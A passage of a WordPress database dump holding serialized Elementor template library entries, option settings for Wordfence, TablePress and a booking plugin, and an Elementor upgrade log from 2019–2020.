Services\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2017/10/Ski-Resort-Services.png\";s:12:\"tmpl_created\";i:1508161134;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/ski-resort-services/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:211;s:16:\"popularity_index\";i:551;s:11:\"trend_index\";i:689;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:731;a:14:{s:2:\"id\";i:2462;s:5:\"title\";s:23:\"Architect &#8211; About\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2017/10/architect-–-about.png\";s:12:\"tmpl_created\";i:1508243317;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/architect-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:212;s:16:\"popularity_index\";i:334;s:11:\"trend_index\";i:616;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:732;a:14:{s:2:\"id\";i:2362;s:5:\"title\";s:26:\"Architect &#8211; Projects\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2017/10/Architect-Projects.png\";s:12:\"tmpl_created\";i:1508243335;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/architect-projects/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:213;s:16:\"popularity_index\";i:399;s:11:\"trend_index\";i:572;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:733;a:14:{s:2:\"id\";i:614;s:5:\"title\";s:25:\"Architect &#8211; Contact\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2016/12/architect-contact.jpg\";s:12:\"tmpl_created\";i:1481549169;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/architect-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:214;s:16:\"popularity_index\";i:303;s:11:\"trend_index\";i:392;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:734;a:14:{s:2:\"id\";i:2126;s:5:\"title\";s:37:\"Construction Company &#8211; Homepage\";s:9:\"thumbnail\";s:91:\"https://library.elementor.com/wp-content/uploads/2017/10/Construction-Company-Home-Page.png\";s:12:\"tmpl_created\";i:1508325849;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/construction-company-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:215;s:16:\"popularity_index\";i:274;s:11:\"trend_index\";i:333;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:735;a:14:{s:2:\"id\";i:2129;s:5:\"title\";s:34:\"Construction Company &#8211; About\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/10/Construction-Company-About.png\";s:12:\"tmpl_created\";i:1508325881;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/construction-company-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:216;s:16:\"popularity_index\";i:306;s:11:\"trend_index\";i:521;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:736;a:14:{s:2:\"id\";i:2135;s:5:\"title\";s:36:\"Construction Company &#8211; Contact\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2017/10/Construction-Company-Contact.png\";s:12:\"tmpl_created\";i:1508325922;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/construction-company-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:217;s:16:\"popularity_index\";i:350;s:11:\"trend_index\";i:414;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:737;a:14:{s:2:\"id\";i:2094;s:5:\"title\";s:28:\"Plants Shop &#8211; Homepage\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/11/Plants-Shop-Home.png\";s:12:\"tmpl_created\";i:1509621053;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/plants-shop-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:218;s:16:\"popularity_index\";i:273;s:11:\"trend_index\";i:189;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:738;a:14:{s:2:\"id\";i:2120;s:5:\"title\";s:25:\"Plants Shop &#8211; About\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/11/Plants-Shop-About.png\";s:12:\"tmpl_created\";i:1509631820;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/plants-shop-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:219;s:16:\"popularity_index\";i:351;s:11:\"trend_index\";i:352;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:739;a:14:{s:2:\"id\";i:3153;s:5:\"title\";s:14:\"Halloween Pack\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/10/halloween.png\";s:12:\"tmpl_created\";i:1508950132;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/halloween-pack/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:220;s:16:\"popularity_index\";i:614;s:11:\"trend_index\";i:0;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:740;a:14:{s:2:\"id\";i:3338;s:5:\"title\";s:31:\"Black Friday &#8211; Nature Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-1.png\";s:12:\"tmpl_created\";i:1511203351;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/black-friday-nature-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:221;s:16:\"popularity_index\";i:545;s:11:\"trend_index\";i:683;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:741;a:14:{s:2:\"id\";i:3339;s:5:\"title\";s:35:\"Black Friday &#8211; Pop-Styled Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-2.png\";s:12:\"tmpl_created\";i:1511203636;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/black-friday-pop-styled-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:222;s:16:\"popularity_index\";i:487;s:11:\"trend_index\";i:679;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:742;a:14:{s:2:\"id\";i:3335;s:5:\"title\";s:31:\"Black Friday &#8211; Retail Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-4.png\";s:12:\"tmpl_created\";i:1511203246;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/black-friday-retail-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:223;s:16:\"popularity_index\";i:489;s:11:\"trend_index\";i:602;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:743;a:14:{s:2:\"id\";i:3340;s:5:\"title\";s:41:\"Black Friday &#8211; Software Product Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-3.png\";s:12:\"tmpl_created\";i:1511203713;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/black-friday-software-product-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:224;s:16:\"popularity_index\";i:460;s:11:\"trend_index\";i:639;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:744;a:14:{s:2:\"id\";i:3517;s:5:\"title\";s:27:\"Christmas &#8211; Gift Shop\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/12/XmasThumb.png\";s:12:\"tmpl_created\";i:1513877937;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/christmas-gift-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:225;s:16:\"popularity_index\";i:543;s:11:\"trend_index\";i:593;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:745;a:14:{s:2:\"id\";i:3734;s:5:\"title\";s:28:\"Christmas &#8211; Car Agency\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/12/cover-lib-v3.png\";s:12:\"tmpl_created\";i:1514197794;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/christmas-car-agency/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:226;s:16:\"popularity_index\";i:521;s:11:\"trend_index\";i:604;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:746;a:14:{s:2:\"id\";i:3764;s:5:\"title\";s:33:\"Christmas &#8211; Interior Design\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/12/cover-lib-v6.png\";s:12:\"tmpl_created\";i:1514198234;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/christmas-interior-design/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:227;s:16:\"popularity_index\";i:494;s:11:\"trend_index\";i:669;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:747;a:14:{s:2:\"id\";i:3565;s:5:\"title\";s:27:\"Christmas &#8211; Tree Shop\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/12/XmasTreeThumb.png\";s:12:\"tmpl_created\";i:1514204382;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/christmas-tree-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:228;s:16:\"popularity_index\";i:419;s:11:\"trend_index\";i:527;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:748;a:14:{s:2:\"id\";i:3862;s:5:\"title\";s:35:\"Christmas &#8211; Design Conference\";s:9:\"thumbnail\";s:63:\"https://library.elementor.com/wp-content/uploads/2017/12/q1.png\";s:12:\"tmpl_created\";i:1514206745;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/christmas-design-conference/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:229;s:16:\"popularity_index\";i:411;s:11:\"trend_index\";i:651;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:749;a:14:{s:2:\"id\";i:3777;s:5:\"title\";s:39:\"Christmas &#8211; Snowboard Competition\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/12/cover-lib-v7.png\";s:12:\"tmpl_created\";i:1514205420;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/christmas-snowboard-competition/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:230;s:16:\"popularity_index\";i:458;s:11:\"trend_index\";i:688;s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:750;a:14:{s:2:\"id\";i:420;s:5:\"title\";s:11:\"Hero UI Kit\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2016/09/library-ui-kit-cover.png\";s:12:\"tmpl_created\";i:1475067229;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/hero-ui-kit/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:231;s:16:\"popularity_index\";i:20;s:11:\"trend_index\";i:62;s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}}}','no'),(19256,'wordfence_version','7.4.12','yes'),(19257,'wordfenceActivated','1','yes'),(19258,'wf_plugin_act_error','','yes'),(19322,'_site_transient_elementor-extras-notice','forever','no'),(19344,'tablepress_plugin_options','{\"plugin_options_db_version\":41,\"table_scheme_db_version\":3,\"prev_tablepress_version\":\"1.11\",\"tablepress_version\":\"1.12\",\"first_activation\":1522535625,\"message_plugin_update\":true,\"message_donation_nag\":true,\"use_custom_css\":true,\"use_custom_css_file\":true,\"custom_css\":\"\",\"custom_css_minified\":\"\",\"custom_css_version\":0}','yes'),(19354,'tablepress_tables','{\"last_id\":3,\"table_post\":{\"1\":679,\"2\":692,\"3\":835}}','yes'),(19389,'_elementor_general_settings','a:2:{s:21:\"default_generic_fonts\";s:10:\"Sans-serif\";s:21:\"global_image_lightbox\";s:3:\"yes\";}','yes'),(19541,'ms_hide_spring2018_ads_until','7570072848','yes'),(19889,'wordfence_syncAttackDataAttempts','0','no'),(19890,'wordfence_syncingAttackData','0','no'),(19891,'wordfence_lastSyncAttackData','1605544897','no'),(20909,'wordfence_installed','1','yes'),(30012,'booking_timeslot_day_bg_as_available','On','yes'),(30013,'booking_is_show_pending_days_as_available','Off','yes'),(30022,'elementor_upgrades','a:3:{s:6:\"2.0.10\";b:1;s:5:\"2.1.0\";b:1;s:5:\"2.3.0\";b:1;}','yes'),(52488,'elementor_log','a:43:{s:32:\"53c6300168eaac4d5ec7dd25f028e3a6\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-07-14 20:00:47\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"2.5.16\";s:2:\"to\";s:5:\"2.6.2\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-07-14 20:00:47\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"2.5.16\";s:2:\"to\";s:5:\"2.6.2\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"02c6ada7ba75f0a483e7e9d6fb67466d\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-07-14 20:00:56\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:36:\"elementor::elementor_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-07-14 20:00:56\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:36:\"elementor::elementor_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"fd6997be9a64c61750ee576591367b21\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-07-14 20:00:56\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:55:\"Elementor/Upgrades - _v_2_6_0_fa4_migration_flag Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-07-14 20:00:56\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:55:\"Elementor/Upgrades - _v_2_6_0_fa4_migration_flag Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"f5c031d5b12933ff4715f3e0279836a2\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-07-14 20:00:56\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:57:\"Elementor/Upgrades - _v_2_6_0_fa4_migration_flag Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-07-14 20:00:56\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:57:\"Elementor/Upgrades - _v_2_6_0_fa4_migration_flag Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"81639ba2654be40ad53b5c24a6c1e354\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-07-14 20:00:56\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"2.5.16\";s:2:\"to\";s:5:\"2.6.2\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-07-14 20:00:56\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"2.5.16\";s:2:\"to\";s:5:\"2.6.2\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"c489e2ccd1b10c16f370ac0c0002bb38\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-07-21 10:48:30\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.6.2\";s:2:\"to\";s:5:\"2.6.5\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-07-21 10:48:30\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.6.2\";s:2:\"to\";s:5:\"2.6.5\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"17c097bfc510fc944fcd4a057751cad5\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-07-28 11:20:13\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.6.5\";s:2:\"to\";s:5:\"2.6.6\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-07-28 11:20:13\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.6.5\";s:2:\"to\";s:5:\"2.6.6\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"414a9f9e88334ac8312ca1ccc660fc89\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-07-28 11:20:20\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:36:\"elementor::elementor_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-07-28 11:20:20\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:36:\"elementor::elementor_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"d1ad510bf8c7ac44822e5225ad0b3eee\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-07-28 11:20:20\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:57:\"Elementor/Upgrades - _v_2_6_6_fa4_migration_button Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-07-28 11:20:20\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:57:\"Elementor/Upgrades - _v_2_6_6_fa4_migration_button Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"8b39394eec7933f19fc5c8c613ae681d\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-07-28 11:20:20\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:59:\"Elementor/Upgrades - _v_2_6_6_fa4_migration_button Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-07-28 11:20:20\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:59:\"Elementor/Upgrades - _v_2_6_6_fa4_migration_button Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"2c91a254344dafd101092be4a6c51a66\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-07-28 11:20:20\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.6.5\";s:2:\"to\";s:5:\"2.6.6\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-07-28 11:20:20\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.6.5\";s:2:\"to\";s:5:\"2.6.6\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"13b08dd6d17b4eee1203bd57b7adb900\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-08-02 14:18:42\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.6.6\";s:2:\"to\";s:5:\"2.6.7\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-08-02 14:18:42\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.6.6\";s:2:\"to\";s:5:\"2.6.7\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"b96a8496f3b06bd0ce60fb18e8b7830e\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-08-22 19:44:47\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.6.7\";s:2:\"to\";s:5:\"2.6.8\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-08-22 19:44:47\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.6.7\";s:2:\"to\";s:5:\"2.6.8\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"ad32a0e42449a4e4fe3507c53e9c835b\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-09-12 12:48:29\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.6.8\";s:2:\"to\";s:5:\"2.7.1\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-09-12 12:48:29\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.6.8\";s:2:\"to\";s:5:\"2.7.1\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"4dda65206cafe3820989748fac942af1\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-05-01 00:19:11\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:36:\"elementor::elementor_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-05-01 00:19:11\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:36:\"elementor::elementor_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"3716126f0efcc356d1158c25e13350c3\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-05-01 00:19:12\";s:7:\"\0*\0type\";s:6:\"notice\";s:10:\"\0*\0message\";s:81:\"Could not find Elementor/Upgrades - _v_2_7_0_rename_document_types_to_wp callback\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-05-01 00:19:12\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:81:\"Could not find Elementor/Upgrades - _v_2_7_0_rename_document_types_to_wp callback\";s:4:\"type\";s:6:\"notice\";}}s:32:\"9f6d8c19292fc79c501b83a23f801830\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-05-01 00:19:12\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:58:\"Elementor/Upgrades - _v_2_7_1_remove_old_usage_data Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-05-01 00:19:12\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:58:\"Elementor/Upgrades - _v_2_7_1_remove_old_usage_data Start 